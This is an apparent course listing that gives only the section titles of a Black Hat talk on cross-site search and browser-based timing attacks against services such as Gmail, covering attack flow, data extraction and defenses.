Overview
Syllabus
Introduction
Title
Agenda
Background
Attacker Example
Advanced CrossSite Search Attacks
Basic CrossSite Search Attack Flow
Step 1 Challenge Search Request
Step 2 Dummy Search Request
Step 2 Challenge Search Request
Step 1 Statistical Tests
Challenges
Response Inflation
Attack on Gmail
Two new attack vectors
Browserbased timing attacks
Classical timing attacks
Algorithmic improvements
Evaluation
Example
Browserbased Optimization
Improved Accuracy
Demo
Limitations
Second Order Attack
Simple Attack
Simple Attack Flow
Inflating Second Order Attack
Extending the Model
How to create an inflating record
Extracting credit card numbers
Sending requests for autocomplete suggestions
Attacked account example
Attacked account demo
Attack success rate
Stealthy attack
Email services
Defenses
Conclusions
Questions
Taught by
Black Hat